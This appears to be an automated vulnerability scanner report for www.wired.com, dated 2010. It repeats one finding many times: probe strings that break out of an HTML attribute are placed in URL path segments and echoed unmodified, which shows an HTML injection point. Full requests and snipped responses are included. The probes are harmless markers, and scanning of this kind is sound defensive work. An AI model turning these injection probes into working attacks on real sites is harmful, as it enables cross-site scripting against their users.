GET /science/discoveriesee3a7"><a>2240bc5bf26/news/2007/03/72723 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:17 GMT Date: Sun, 21 Nov 2010 23:11:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesee3a7"><a>2240bc5bf26 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e7bf"><a>a0ed15676db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news6e7bf"><a>a0ed15676db/2007/03/72723 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:29 GMT Date: Sun, 21 Nov 2010 23:11:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news6e7bf"><a>a0ed15676db"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe9ae"><a>f527668027f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencefe9ae"><a>f527668027f/discoveries/news/2007/03/72805 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:56 GMT Date: Sun, 21 Nov 2010 23:10:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencefe9ae"><a>f527668027f ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e162"><a>7810533295 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries7e162"><a>7810533295/news/2007/03/72805 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29310 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:13 GMT Date: Sun, 21 Nov 2010 23:11:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries7e162"><a>7810533295 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8058d"><a>0c1616ffa46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news8058d"><a>0c1616ffa46/2007/03/72805 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29312 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news8058d"><a>0c1616ffa46"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2776e"><a>2cf882d2876 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2776e"><a>2cf882d2876/discoveries/news/2007/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:38 GMT Date: Sun, 21 Nov 2010 23:09:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science2776e"><a>2cf882d2876 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94cdc"><a>0cc65881279 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries94cdc"><a>0cc65881279/news/2007/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:07 GMT Date: Sun, 21 Nov 2010 23:10:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries94cdc"><a>0cc65881279 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7dad"><a>bdaa03d0efd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb7dad"><a>bdaa03d0efd/2007/04/dayintech_0408 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:27 GMT Date: Sun, 21 Nov 2010 23:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb7dad"><a>bdaa03d0efd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4a"><a>db634723549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science45d4a"><a>db634723549/discoveries/news/2007/04/dayintech_0411 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:05 GMT Date: Sun, 21 Nov 2010 23:10:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science45d4a"><a>db634723549 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52754"><a>779fdc29594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries52754"><a>779fdc29594/news/2007/04/dayintech_0411 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:34 GMT Date: Sun, 21 Nov 2010 23:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries52754"><a>779fdc29594 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c53d"><a>70481f04aba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1c53d"><a>70481f04aba/2007/04/dayintech_0411 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:45 GMT Date: Sun, 21 Nov 2010 23:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news1c53d"><a>70481f04aba"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f61"><a>cb8010c293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee2f61"><a>cb8010c293b/discoveries/news/2007/04/dayintech_0426 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:51 GMT Date: Sun, 21 Nov 2010 23:09:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencee2f61"><a>cb8010c293b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76756"><a>179b35b8b9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries76756"><a>179b35b8b9f/news/2007/04/dayintech_0426 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:21 GMT Date: Sun, 21 Nov 2010 23:10:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries76756"><a>179b35b8b9f c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6c7"><a>f3b3a70bcbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news7e6c7"><a>f3b3a70bcbe/2007/04/dayintech_0426 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:37 GMT Date: Sun, 21 Nov 2010 23:10:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news7e6c7"><a>f3b3a70bcbe"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e8c"><a>82286881d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science78e8c"><a>82286881d2/discoveries/news/2007/04/dayintech_0427 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:40 GMT Date: Sun, 21 Nov 2010 23:09:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science78e8c"><a>82286881d2 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82709"><a>31e9f734c89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries82709"><a>31e9f734c89/news/2007/04/dayintech_0427 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:08 GMT Date: Sun, 21 Nov 2010 23:10:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries82709"><a>31e9f734c89 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59461"><a>c9541460a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news59461"><a>c9541460a9/2007/04/dayintech_0427 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:27 GMT Date: Sun, 21 Nov 2010 23:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news59461"><a>c9541460a9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2efb"><a>fefb1eda5ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee2efb"><a>fefb1eda5ce/discoveries/news/2007/05/dayintech_0503 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:20:15 GMT Date: Sun, 21 Nov 2010 23:10:15 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencee2efb"><a>fefb1eda5ce ss_discoveries c_news"> ...[SNIP]...
